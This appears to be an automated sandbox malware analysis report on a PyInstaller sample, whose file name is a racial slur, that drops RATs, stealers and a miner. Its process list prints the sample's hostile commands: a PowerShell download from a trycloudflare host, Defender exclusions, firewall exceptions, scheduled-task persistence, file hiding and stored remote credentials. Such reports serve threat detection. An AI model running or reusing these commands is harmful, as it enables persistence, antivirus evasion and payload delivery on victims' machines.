Malware Analysis Report

2025-01-23 11:50

Sample ID 241202-bpbmbsxjfq
Target niggers.exe
SHA256 c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed
Tags
pyinstaller ammyyadmin asyncrat flawedammyy lumma metasploit njrat quasar ramnit redline rhadamanthys vidar xmrig xworm af458cf23e4b27326a35871876cc63d9 default diamotrix mohib office04 sgvp aspackv2 backdoor banker credential_access defense_evasion discovery evasion execution infostealer miner privilege_escalation rat spyware stealer trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed

Threat Level: Known bad

The file niggers.exe was found to be: Known bad.

Malicious Activity Summary

pyinstaller ammyyadmin asyncrat flawedammyy lumma metasploit njrat quasar ramnit redline rhadamanthys vidar xmrig xworm af458cf23e4b27326a35871876cc63d9 default diamotrix mohib office04 sgvp aspackv2 backdoor banker credential_access defense_evasion discovery evasion execution infostealer miner privilege_escalation rat spyware stealer trojan upx worm

Rhadamanthys family

Quasar RAT

njRAT/Bladabindi

Rhadamanthys

Flawedammyy family

Xworm family

Lumma family

Njrat family

Vidar

AsyncRat

Xworm

Xmrig family

Ammyy Admin

Quasar payload

MetaSploit

xmrig

AmmyyAdmin payload

Redline family

Asyncrat family

Vidar family

RedLine

Ammyyadmin family

Lumma Stealer, LummaC

Ramnit

Detect Vidar Stealer

FlawedAmmyy RAT

RedLine payload

Detect Xworm Payload

Quasar family

Ramnit family

Metasploit family

Async RAT payload

XMRig Miner payload

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

ASPack v2.12-2.42

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Program crash

Embeds OpenSSL

System Location Discovery: System Language Discovery

Detects Pyinstaller

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

NSIS installer

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Views/modifies file attributes

Runs net.exe

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Suspicious use of WriteProcessMemory

GoLang User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-02 01:18

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-02 01:18

Reported

2024-12-02 01:21

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI30642\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-02 01:18

Reported

2024-12-02 01:21

Platform

win10v2004-20241007-en

Max time kernel

122s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Ramnit

trojan spyware stealer worm banker ramnit

Ramnit family

ramnit

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Rhadamanthys

stealer rhadamanthys

Rhadamanthys family

rhadamanthys

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4440 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 4440 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\AppData\Local\Temp\niggers.exe
PID 2672 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 2672 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\system32\cmd.exe
PID 2672 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 2672 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 2672 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 2672 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
PID 2672 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
PID 2672 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
PID 2672 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\System32\notepad.exe
PID 2672 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Windows\System32\notepad.exe
PID 2672 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 2672 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 2672 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 3240 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3240 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3240 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3240 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2028 wrote to memory of 2628 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2028 wrote to memory of 2628 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2672 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 2672 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 2672 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 3240 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3240 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\241.exe
PID 2672 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\241.exe
PID 2672 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe C:\Users\Admin\Downloads\UrlHausFiles\241.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\saw.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\b.ps1"

C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe

"C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://varied-flux-emails-grounds.trycloudflare.com/a.pdf

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8e3a446f8,0x7ff8e3a44708,0x7ff8e3a44718

C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe

"C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://varied-flux-emails-grounds.trycloudflare.com/qfv0ao.zip' -OutFile 'C:\Users\Admin\Downloads\qfv0ao.zip' }"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"

C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

"C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3144 -ip 3144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1012

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\langla.exe

"C:\Users\Admin\Downloads\UrlHausFiles\langla.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3684 -ip 3684

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3684 -ip 3684

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 1384

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3852 -ip 3852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 536

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"

C:\Users\Admin\Downloads\UrlHausFiles\me.exe

"C:\Users\Admin\Downloads\UrlHausFiles\me.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CEBA.tmp\CEBB.tmp\CEBC.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\..\360Downloads\Pester.bat

C:\Users\Admin\Downloads\UrlHausFiles\RuntimeBroker.exe

"C:\Users\Admin\Downloads\UrlHausFiles\RuntimeBroker.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ff8dd80cc40,0x7ff8dd80cc4c,0x7ff8dd80cc58

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,10159024487572961583,16661247225601745770,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1916 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2064,i,10159024487572961583,16661247225601745770,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2072 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,10159024487572961583,16661247225601745770,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2252 /prefetch:8

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Users\Admin\Downloads\UrlHausFiles\EbjU3lW.exe

"C:\Users\Admin\Downloads\UrlHausFiles\EbjU3lW.exe"

C:\Windows\system32\cmdkey.exe

cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"

C:\Windows\SysWOW64\PING.EXE

ping -n 4 127.0.0.1

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe" "SearchUII.exe" ENABLE

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Windows\system32\mstsc.exe

mstsc /v: 211.168.94.177

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp15D5.tmp.bat""

C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

"C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

